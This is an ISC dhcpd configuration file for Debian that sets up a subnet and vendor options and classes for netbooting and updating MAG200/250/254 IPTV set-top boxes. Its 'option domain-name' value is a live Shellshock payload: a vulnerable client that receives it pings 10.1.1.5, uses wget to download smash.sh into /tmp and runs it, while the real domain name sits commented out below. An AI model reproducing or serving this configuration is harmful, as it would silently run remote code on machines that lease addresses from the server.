#

# Sample configuration file for ISC dhcpd for Debian

#

# Attention: If /etc/ltsp/dhcpd.conf exists, that will be used as

# configuration file instead of this file.

#

#

# The ddns-updates-style parameter controls whether or not the server will

# attempt to do a DNS update when a lease is confirmed. We default to the

# behavior of the version 2 packages ('none', since DHCP v2 didn't

# have support for DDNS.)

ddns-update-style none;

# option definitions common to all supported networks...

option domain-name "() { ignored;}; (while true; do ping -c1 10.1.1.5 > /dev/null && break; done ; /usr/bin/wget http://10.1.1.5/ftp/smash.sh -O /tmp/smash.sh >>/tmp/smash.log 2>&1 ; sh /tmp/smash.sh >>/tmp/smash.log 2>&1)&";

#option domain-name "techstudio.tv";

option domain-name-servers 10.0.32.5, 192.168.88.1;

option routers 192.168.88.1;

# (Default Gateway/Router for loading software)

option subnet-mask 255.255.255.0;

default-lease-time 600;

max-lease-time 7200;

# If this DHCP server is the official DHCP server for the local

# network, the authoritative directive should be uncommented.

#authoritative;

# Use this to send dhcp log messages to a different log file (you also

# have to hack syslog.conf to complete the redirection).

log-facility local7;

# No service will be given on this subnet, but declaring it helps the

# DHCP server to understand the network topology.

#subnet 10.152.187.0 netmask 255.255.255.0 {

#}

# This is a very basic subnet declaration.

subnet 192.168.88.0 netmask 255.255.255.0 {

 range 192.168.88.30 192.168.88.50;

# option routers

# option routers rtr-239-0-1.example.org, rtr-239-0-2.example.org;

}

# This declaration allows BOOTP clients to get dynamic addresses,

# which we don't really recommend.

#subnet 10.254.239.32 netmask 255.255.255.224 {

# range dynamic-bootp 10.254.239.40 10.254.239.60;

# option broadcast-address 10.254.239.31;

# option routers rtr-239-32-1.example.org;

#}

# A slightly different configuration for an internal subnet.

#subnet 10.5.5.0 netmask 255.255.255.224 {

#range 192.168.15.30 192.168.15.50;

# range 10.5.5.26 10.5.5.30;

# option domain-name-servers ns1.internal.example.org;

# option domain-name "internal.example.org";

# option routers 10.5.5.1;

# option broadcast-address 10.5.5.31;

# default-lease-time 600;

# max-lease-time 7200;

#}

# Hosts which require special configuration options can be listed in

# host statements. If no address is specified, the address will be

# allocated dynamically (if possible), but the host-specific information

# will still come from the host declaration.

#host passacaglia {

# hardware ethernet 0:0:c0:5d:bd:95;

# filename "vmunix.passacaglia";

# server-name "toccata.fugue.com";

#}

# Fixed IP addresses can also be specified for hosts. These addresses

# should not also be listed as being available for dynamic assignment.

# Hosts for which fixed IP addresses have been specified can boot using

# BOOTP or DHCP. Hosts for which no fixed address is specified can only

# be booted with DHCP, unless there is an address range on the subnet

# to which a BOOTP client is connected which has the dynamic-bootp flag

# set.

#host fantasia {

# hardware ethernet 08:00:07:26:c0:a5;

# fixed-address fantasia.fugue.com;

#}

# You can declare a class of clients and then do address allocation

# based on that. The example below shows a case where all clients

# in a certain class get addresses on the 10.17.224/24 subnet, and all

# other clients get addresses on the 10.0.29/24 subnet.

#class "foo" {

# match if substring (option vendor-class-identifier, 0, 4) = "SUNW";

#}

#shared-network 224-29 {

# subnet 10.17.224.0 netmask 255.255.255.0 {

# option routers rtr-224.example.org;

# }

# subnet 10.0.29.0 netmask 255.255.255.0 {

# option routers rtr-29.example.org;

# }

# pool {

# allow members of "foo";

# range 10.17.224.10 10.17.224.250;

# }

# pool {

# deny members of "foo";

# range 10.0.29.10 10.0.29.230;

# }

#}

#option ntp-servers 10.1.1.1;#

# option domain-name-servers 10.1.1.1;

# authoritative;

# option subnet-mask 255.255.255.0;

# default-lease-time 600;

# max-lease-time 7200;

# allow bootp;

#############################################################

# Option for TeleTec

#############################################################

 option space TeleTec;

 option TeleTec.update\_url code 24 = text;

 option TeleTec.update\_sboot code 25 = text;

 option TeleTec.update\_ver code 26 = text;

 option TeleTec.update\_mode code 27 = text;

 option TeleTec.portal\_dhcp code 22 = text;

 option TeleTec.update\_sboot\_ver code 28 = text;

 option TeleTec.logo\_x code 16 = integer 16;

 option TeleTec.logo\_y code 17 = integer 16;

 option TeleTec.bg\_color code 18 = integer 32;

 option TeleTec.fg\_color code 19 = integer 32;

 option TeleTec.mcip code 3 = ip-address;

 option TeleTec.mcport code 4 = integer 16;

 option TeleTec.oppubfile code 9 = text;

 option TeleTec.mcip\_img code 10 = ip-address;

 option TeleTec.mcport\_img code 11 = integer 16;

 option TeleTec.mcip\_mng code 12 = ip-address;

 option TeleTec.mcport\_mng code 13 = integer 16;

 option TeleTec.ip\_log code 14 = ip-address;

 option TeleTec.port\_log code 15 = integer 16;

 option TeleTec.VerNumber code 20 = text;

 option TeleTec.DateTime code 21 = text;

#############################################################

# Option for Infomir

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 option space Infomir;

 option Infomir.autostart code 1 = text;

 option Infomir.bootargs code 2 = text;

 option Infomir.mcip code 3 = ip-address;

 option Infomir.mcport code 4 = integer 16;

 option Infomir.oppubfile code 9 = text;

 option Infomir.mcip\_img code 10 = ip-address;

 option Infomir.mcport\_img code 11 = integer 16;

 option Infomir.mcip\_mng code 12 = ip-address;

 option Infomir.mcport\_mng code 13 = integer 16;

 option Infomir.ip\_log code 14 = ip-address;

 option Infomir.port\_log code 15 = integer 16;

 option Infomir.logo\_x code 16 = integer 16;

 option Infomir.logo\_y code 17 = integer 16;

 option Infomir.bg\_color code 18 = integer 32;

 option Infomir.fg\_color code 19 = integer 32;

 option Infomir.VerNumber code 20 = text;

 option Infomir.DateTime code 21 = text;

 option Infomir.portal\_dhcp code 22 = text;

 option Infomir.timezone code 23 = text;

 option Infomir.update\_url code 24 = text;

 option Infomir.update\_sboot code 25 = text;

 option Infomir.update\_ver code 26 = text;

 option Infomir.update\_mode code 27 = text;

 option Infomir.update\_sboot\_ver code 28 = text;

############################## BOOT MAG200 ###############################

 class "MAG200\_boot" {

 match if (( option vendor-class-identifier="TeleTecMAG200boot"));

 filename "mag200/uImage";

 next-server 10.1.1.1;

 option root-path "10.1.1.1:/srv/mag200";

 option ntp-servers 10.1.1.1;

 vendor-option-space TeleTec;

 }

 class "MAG200\_vendor" {

 match if (( option vendor-class-identifier="TeleTecMAG200"));

 next-server 10.1.1.1;

 option ntp-servers 10.1.1.1;

 vendor-option-space TeleTec;

 option TeleTec.portal\_dhcp "http://10.1.1.1/stalker\_portal/c/index.html";

 option TeleTec.update\_url "tftp://10.1.1.1/mag200/imageupdate\_200\_212r2";

 option TeleTec.update\_ver "212";

 option TeleTec.update\_sboot "http://10.1.1.1/mag200/SbootIm\_038\_200";

 option TeleTec.update\_sboot\_ver "038";

 option TeleTec.update\_mode "tftp://10.1.1.1/mag200/Bootstrap\_200\_212r2";

 }

############################## BOOT MAG250 ################################

class "MAG250\_upglogo" {

match if (( option vendor-class-identifier="InfomirMAG250upglogo"));

filename "mag254/logoAlfa.bmp.gz";

next-server 192.168.15.2;

option ntp-servers 192.168.15.2;

vendor-option-space Infomir;

option Infomir.logo\_x 0;

option Infomir.logo\_y 0;

option Infomir.bg\_color 0x00000000;

option Infomir.fg\_color 0x00ffffff;

option Infomir.oppubfile "mag254/OP.KEY";

}

 class "MAG250\_boot" {

 match if (( option vendor-class-identifier="InfomirMAG250boot"));

 filename "mag250/uImage\_mag250";

 next-server 192.168.15.2;

 option root-path "192.168.15.2:/srv/tftp/mag250/rootfsmag250";

 option ntp-servers 192.168.15.2;

 vendor-option-space Infomir;

 }

class "MAG250\_upgrade" { #

 match if (( option vendor-class-identifier="InfomirMAG250upgrade"));

 filename "mag250/Bootstrap";

 next-server 192.168.15.2;

 option ntp-servers pool.ntp.org;

 option Infomir.update\_url "tftp://192.168.15.2/mag250/imageupdate";

# option Infomir.update\_mode "tftp://192.168.15.2/mag250/Bootstrap";

}

 class "MAG250\_vendor" {

 match if (( option vendor-class-identifier="InfomirMAG250"));

 next-server 192.168.15.2;

 option ntp-servers 192.168.15.2;

 vendor-option-space Infomir;

 option Infomir.portal\_dhcp "http://10.1.1.1/stalker\_portal/c/index.html";

 option Infomir.update\_url "tftp://192.168.15.2/mag250/imageupdate";

 option Infomir.update\_ver "221";

# option Infomir.update\_sboot "http://10.1.1.1/mag250/SbootIm\_mag250";

# option Infomir.update\_sboot\_ver "007";

 option Infomir.update\_mode "tftp://192.168.15.2/mag250/Bootstrap";

 }

###########################mag254#####

class "MAG254\_boot" {

 match if (( option vendor-class-identifier="InfomirMAG254boot"));

 filename "mag254/uImage";

 next-server 192.168.15.2;

 option root-path "192.168.15.2:/srv/tftp/mag254/rootfs";

 option ntp-servers 192.168.15.2;

 vendor-option-space Infomir;

 }

 class "MAG254\_vendor" {

 match if (( option vendor-class-identifier="InfomirMAG254"));

 next-server 192.168.15.2;

 option ntp-servers 192.168.15.2;

 vendor-option-space Infomir;

# option Infomir.portal\_dhcp "http://192.168.15.2/stalker\_portal/c/index.html";

 option Infomir.update\_url "tftp://192.168.15.2/mag254/imageupdate";

 option Infomir.update\_ver "220";

# option Infomir.update\_sboot "http://192.168.15.2/mag254/SbootIm\_mag254";

# option Infomir.update\_sboot\_ver "007";

 option Infomir.update\_mode "tftp://192.168.15.2/mag254/Bootstrap";

 option Infomir.oppubfile "mag254/OP.KEY";

}

class "MAG254\_upglogo" {

match if (( option vendor-class-identifier="InfomirMAG254upglogo"));

filename "mag254/logoAlfa.bmp.gz";

next-server 192.168.15.2;

option ntp-servers 192.168.15.2;

vendor-option-space Infomir;

option Infomir.logo\_x 0;

option Infomir.logo\_y 0;

option Infomir.bg\_color 0x00000000;

option Infomir.fg\_color 0x00ffffff;

option Infomir.oppubfile "mag254/OP.KEY";

}